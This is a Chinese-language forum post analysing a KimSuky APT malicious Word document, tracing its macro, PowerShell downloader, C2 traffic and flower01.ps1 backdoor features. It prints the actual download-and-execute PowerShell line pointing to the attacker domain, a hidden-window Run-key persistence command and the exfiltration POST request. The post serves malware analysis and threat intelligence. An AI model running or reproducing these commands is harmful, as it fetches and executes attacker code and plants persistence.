一次KimSuky攻击事件分析

zhaorong · 发表于 2021-11-20 15:00:59

本帖最后由 zhaorong 于 2021-11-20 15:02 编辑

0x00 背景

近日，在平时的威胁情报收集中发现了一起韩国APT组织KimSuky的攻击事件
对整个事件进行完整分析之后觉得自己对样本分析和流量分析的认识又上了一
层楼在这里分享给大家。希望可以一起学习进步。

0x01 分析工具

win7 64位

office2013

Wireshark

0x02 样本背景

样本MD5为07D0BE79BE38ECB8C7B1C80AB0BD8344 来源于免费沙箱app.any.run。
app.any.run是一个国际化的免费沙箱，有非常友好的界面可以很好地跑出大部分恶意样本的行为
网络请求等信息。并且它可以免费下载样本目前是我分析样本的主要来源。
app.any.run的Public submissions会显示每天捕获到的新样本然后用户可以
点击到对应的样本中查看沙箱报告以及下载样本。
在某天我看到了如下的样本：

app.any.run提示这是一个office宏的恶意文件考虑到近年来非PE的恶意文件已经越来越流行
故尝试将这个样本下载回来进行分析。

0x03 样本分析

首先，通过virustotal获取样本的一些基本信息。

通过virustotal可以得知，样本原始名称：

붙임. 전문가 칼럼 원고 작성 양식.doc

首先，通过virustotal获取样本的一些基本信息。

通过virustotal可以得知，样本原始名称：

붙임. 전문가 칼럼 원고 작성 양식.doc

创建时间和上传VT时间如下：

根据文件投放名称，可以初步判断该样本是用于攻击朝鲜/韩国的恶意样本光从
文件名上暂时无法确定攻击目标。

打开样本样本伪装为微软官方提示用户启用宏以查看内容

启用宏之后文档内容更改为如下所示：

翻译之后如下：

《专家评论》稿件制作样式

▶人文名调11pt，行距160%，2张以内分量

开城工业园区专家评论..。

原始文件是office宏代码的恶意样本准备对宏代码调试的时候发现代码被加密了：

通过工具破解宏密码之后看到宏代码如下主要功能是在c:\windows\temp\路径下释放一个bobo.txt
文件然后将一行powershell命令写入到该文件中，再调用执行。

这里由于分析到是powershell.exe指令指令于是重新打开样本并通过火绒剑检测powershell.exe的行为

这里可以看到，是读取'c:\windows\temp\bobo.txt'的内容然后通过iex执行
bobo.txt内容如下
IEX (New-Object System.Net.WebClient).DownloadString('http://mybobo.mygam
esonline.org/flower01/flower01.ps1')

该段代码的主要功能是从http[:]//mybobo.mygamesonline.org/flower01/flower
01.ps1下载一个新的powershell脚本。

而该域名已经被打上了KimSuky的标签

但是经过分析该地址目前已经不返回数据了

思路1 通过vt查找

这个时候我们接着回到VT 可以看到如下的内容：

跟过来之后发现有成功请求之后保留的文件

顺着这个文件hash，就可以找到目标powershell脚本了

如果有vt下载权限即可通过该hash将powershell脚本下载回来。

思路2 通过app.any.run的流量包

我们回到app.any.run的页面可以发现在沙箱中样本是正常与服务器通信并且保留了
流量的我们直接把数据包下载到本地进行分析和提取。

可以看到，样本首先是通过三次握手与服务器建立了建立紧接着就
通过get请求的方式访问了下载页面
而后面服务器返回的数据应该就是flower01.ps的内容了

根据数据包大小可以得知返回的内容从第二个数据包开始：

由于是明文传输直接复制为纯文本就可以

将几个数据包的内容复制到编辑器中，脚本就从流量中提出来了

流量分析

既然已经打开了流量包就多分析一点
接着往后看可以看到本地主机还对C2发送了POS数据包且看后面包的大小基本可以判定是在窃密了。
而这一段流量应该是刚才下载回来的ps脚本发起的，所以不出意外的话本次攻击的最终
载荷就是这个ps脚本了。（毕竟也够长）

这里post请求的内容是：

POST /flower01/post.php HTTP/1.1..
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG..
Host: mybobo.mygamesonline.org..
Content-Length: 10694..
Expect: 100-continue....

其中有几个关键信息
boundary=----WebKitFormBoundarywhpFxMBe19cSjFnG..
我们可以通过搜索引擎检索WebKitFormBoundarywhpFxMBe19cSjFnG
会得到如下的结果

通过搜索引擎反馈的结果我们可以知道，该串字符不是首次出现早在18年在针对韩国冬奥会
的攻击中就已经出现过。而且也被爆与KimSuky有关联。
post请求成功之后服务器会返回Continue
接着客户端会尝试以1260字节大小为数据包向服务器发送加密数据

之后再次请求

RT6>RTJE^@dR+RUP_?"P------WebKitFormBoundarywhpFxMBe19cSjFnG Content-Disposition: fo
rm-data; name="MAX_FILE_SIZE" 10000000 ------WebKitFormBoundarywhpFxMBe19cSjFnG Conte
nt-Disposition: form-data; name="userfile"; filename="flower01" Content-Type: application/octet-
stream ending ------WebKitFormBoundarywhpFxMBe19cSjFnG

flower01.ps1分析

虽然从搜索引擎来看基本可以确定本次所使用的powershell应该是PowerShell Empire
框架生成的远控。但并不复杂也可以详细分析一下

脚本首先定义了一些全局变量
根据定义的这些全局变量可以看出来
后续的通信地址应该是："http://mybobo.mygamesonline.org/flower01/"
用于接收上传信息的文件： "post.php"
上传的用户名： "flower01"
上传的ID："flower01"
保存的log文件名：$LOG_FILENAME = "flower01.hwp"
保存的log文件路径：$LOG_FILEPATH = "\flower01\"
休眠时间：$TIME_VALUE = 1000*60*60
应该是调用执行脚本：$EXE = "rundll32.exe"
调用func：$MyfuncName = "Run"
写入的注册表键值：$RegValueName = "Alzipupdate"
写入的是开机自启动的键：$RegKey = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
最后这个应该是计划任务：$regValue = "cmd.exe /c powershell.exe -windowstyle hidden IEX (New-Object
System.Net.WebClient).DownloadString('http://mybobo.mygamesonline.org/flower01/flower01.ps1')"

接着脚本定义了一些方法，分别是：
function decode($encstr)
function UpLoadFunc($logpath)
function FileUploading($upPathName)
function Download
function Get_info($logpath)
function main
从方法名基本可以确定这是一个powershell远控，可以收集信息文件上传文件下载样本持久化等功能。
在main函数下断点，可以看到样本首先定义后后面log文件的路径。然后会判断是否有对应的注册表
键值即判定是否已经设置为开机自启动了。

如果返回False 则会通过修改HKCU:\SOFTWARE\Microsoft\Windows\CurrentV
ersion\Run的方式将自己加入到开机自启动。
并且调用Get_info函数参数是szLogPath 也就是C:\Users\Shyt\
AppData\Roaming\flower01\flower01.hwp
所以这里的flower01.hwp是用于保存Get_info函数收集到的信息
在Get_info中。会写入几个目录信息然后将systeminfo以及当前的进
程全部写入到flower01.hwp

如果返回True。则会进入一个永真循环循环调用FileUploading和Download函数
并在调用完成之后进行一段时间的休眠。

第一次调用FileUploading的时候会判断是否存在路径FileUploading也就
是C:\Users\xxx\AppData\Roaming\flower01\flower01.hwp
如果存在则调用后面的UploadFunc，如果不存在则直接返回

如果存在flower01.hwp则说明信息采集成功则调用UploadFunc准备上传
在UploadFunc方法中，会读取flower01.hwp的hex数据然后通
过decode进行加密再上传到服务器

加密算法是自定义的变异凯撒加密即ascii替换的方式

调用完成之后会调用Download函数：

函数会尝试从http://mybobo.mygamesonline.org/flower01/flower01.down获取
数据并传入到decode函数进行解码

如果下载失败，则会尝试访问http://mybobo.mygamesonline.org/flower01/del.p
hp?filename=flower01获取返回值

因为不想用干净的网络访问C2，所以我还是尝试通过app.any.run的在线沙箱跑一下
这个powershell样本。

虽然成功跑起来了但是看到了一些报错信息

于是把对应的报错信息、slepp都删除了重新上传。

发现服务器mybobo.mygamesonline.org已经挂了没有后续的数据了。

0x04 总结

至此，样本的分析已经完成在本次恶意样本分析中我们可以发现通常情况下攻击者特别是定向攻击者
会在实施攻击后的不久就将攻击所使用的服务器给下架。如果没有捕获到具体的攻击样本或是没有全流
量记录的设备。可能会在被攻击者窃取机密数据的情况下还截然不知。

[网络安全] 一次KimSuky攻击事件分析

浏览过的版块

		自动登录	找回密码
密码			注册